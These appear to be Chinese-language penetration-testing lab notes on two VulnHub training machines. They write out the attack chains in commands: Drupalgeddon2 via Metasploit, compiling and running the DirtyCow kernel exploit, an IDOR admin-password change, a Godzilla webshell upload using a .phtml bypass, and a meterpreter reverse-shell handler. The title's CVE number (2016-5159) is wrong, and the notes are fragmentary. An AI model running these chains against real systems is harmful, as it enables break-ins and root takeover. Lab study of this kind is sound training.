案例一dirtycow(CVE-2016-5159)
有個前置知識就是? 獲取liunx的內核
uname -a
然后這個內核漏洞進行提權的步驟也是和手工win進行提權差不多? ?也是需要使用輔助工具在本地進行輔助檢測? 然后去nomi-sec/PoC-in-GitHub: 📡 從 GitHub 自動收集 PoC。?? 小心惡意軟件。
去找尋exp或者使用? ?msf本地的? 梭哈模塊去尋找利用的漏洞
run post/multi/recon/local_exploit_suggester
輔助檢測工具:
單一的內核漏洞檢測:https://github.com/The-Z-Labs/linux-exploit-suggester
綜合型的工具:


靶機下載地址




















g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil


復現環境:https://www.vulnhub.com/entry/lampiao-1,249/
1、信息收集:
nmap -p1-65535 192.168.139.0/24
2、Web漏洞利用:
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
3、內核提權:
upload /root/linux-exploit-suggester.sh /tmp/1.sh
shell
cd /tmp
chmod +x 1.sh
./1.sh
https://github.com/gbonacini/CVE-2016-5195
upload /root/dcow.cpp /tmp/dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
su root
案例二? pwnkit??
靶機下載https://www.vulnhub.com/entry/darkhole-1,724/
sudo arp-scan -l
先掃描內網的ip
開放了80?
這個漏洞是前端的一個邏輯越權漏洞 先注冊一個賬號
賬號修改里出現這個id可能就是 代表的賬戶?
我們試一下改為1會不會直接修改admin的賬號和密碼
哥斯拉生成后門?使用繞過形式 改為 .phtml 進行繞過
后門上傳成功
后門地點
http://192.168.248.136/upload/xxx.phtml
學個新操做? ?哥斯拉聯動msf(在不使用msfvemon生成反彈shell的情況下)
命令:
71 use /exploits/multi/handler
72 ip a
73 set payload php/meterpreter/reverse_tcp
74 set lport 5566
75 history
先加載再go
接受到了shell? ?然后進行提權
上傳檢測腳本
這個就是我們要學的新漏洞
第一個方法就是使用本地漏掃工具

